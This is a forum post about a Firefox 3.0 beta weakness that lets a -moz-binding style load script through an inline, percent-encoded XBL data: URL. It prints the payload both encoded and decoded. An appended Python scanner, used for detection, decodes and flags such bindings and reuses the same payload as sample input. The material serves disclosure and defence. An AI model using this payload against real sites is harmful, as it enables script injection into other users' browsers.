Hi OrangeCrate,
But do not run FF 3.0b3 without NoScript, because the old NoScript silently does its work in the background preventing this, where the FF 3.0 devs left this hole:
it looks like the ever popular -moz-binding css attribute is now rendered a little less useful. It is now impossible to load off-site XBL via this method.
However, all is not lost. For in patching one of the biggest holes in Firefox’s security model, the infinite wisdom of the FF devs is that it is now possible to embed a -moz-binding URL tag inline, like this:
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />
Using this method provides for no use of a fragment identifier, indeed it is only possible to use the first element. The above XBL decodes to:
<?xml version="1.0"?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="loader"><implementation><constructor><![CDATA[var url = "alert.js";var scr = document.createElement("script");scr.setAttribute("src",url);var bodyElement = document.getElementsByTagName("html").item(0);bodyElement.appendChild(scr);]]></constructor></implementation></binding></bindings>
which essentially creates a nice new DOM script element that loads alert.js.
NoScript completely protects you against this,
polonus
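The post above shows why a filter that only blocks off-site -moz-binding URLs is not enough: the binding can travel inline in a percent-encoded data: URL. The following is an added example, not code from the post or from NoScript, showing how a content filter or log scanner can pull -moz-binding declarations out of inline style attributes, decode a data: payload back to its XBL text, and flag bindings that carry executable XBL parts (constructor, destructor, handler, method). The sample markup is the snippet quoted in the post, with its curly quotes straightened so it parses as HTML; everything else (function and class names, the heuristic) is an assumption of this example.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Sample markup: the inline -moz-binding snippet quoted in the post above,
# plus one harmless inline style, so the scanner has something to ignore.
SAMPLE_HTML = '''<html><body>
<p>hello</p>
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />
<div style="color: red"></div>
</body></html>'''

# Matches "-moz-binding: url(<target>)" inside a style attribute value.
# The target may be quoted or bare; it ends at the closing parenthesis.
BINDING_RE = re.compile(
    r'-moz-binding\s*:\s*url\(\s*["\']?([^"\')]+)["\']?\s*\)', re.IGNORECASE)

# Executable XBL parts: these are where script attached to a binding runs.
XBL_SCRIPT_RE = re.compile(r"<(constructor|destructor|handler|method)\b", re.IGNORECASE)


class BindingScanner(HTMLParser):
    """Collects (tag, binding url) pairs from inline style attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names and unescapes entities for us.
        for name, value in attrs:
            if name == "style" and value:
                for match in BINDING_RE.finditer(value):
                    self.findings.append((tag, match.group(1).strip()))


def decode_binding_url(url):
    """Return the XBL text carried by a data: URL, or None for a remote URL."""
    if not url.lower().startswith("data:"):
        return None
    header, _, body = url.partition(",")
    if ";base64" in header.lower():
        return base64.b64decode(body).decode("utf-8", "replace")
    return unquote(body)


def scan(html):
    """Scan markup for -moz-binding declarations and describe each one."""
    parser = BindingScanner()
    parser.feed(html)
    parser.close()
    results = []
    for tag, url in parser.findings:
        xbl = decode_binding_url(url)
        results.append({
            "tag": tag,
            "kind": "inline-data" if xbl is not None else "remote",
            "url": url,
            "xbl": xbl,
            # Heuristic (assumption of this example): a binding with an
            # executable part is treated as script, whatever it loads.
            "has_script": bool(xbl and XBL_SCRIPT_RE.search(xbl)),
        })
    return results


if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML):
        print(f"<{finding['tag']}> {finding['kind']} binding, "
              f"script={finding['has_script']}")
        if finding["xbl"]:
            print("  decoded XBL:", finding["xbl"])
```

The scanner does not try to be a full CSS parser; it is the kind of check a reverse proxy, a mail gateway or a forum's HTML sanitiser can run, and the point it makes is that the decoded payload, not the URL scheme, is what needs inspecting. Anything that matches is worth dropping the whole style attribute over, since a binding has no legitimate use in user-supplied markup.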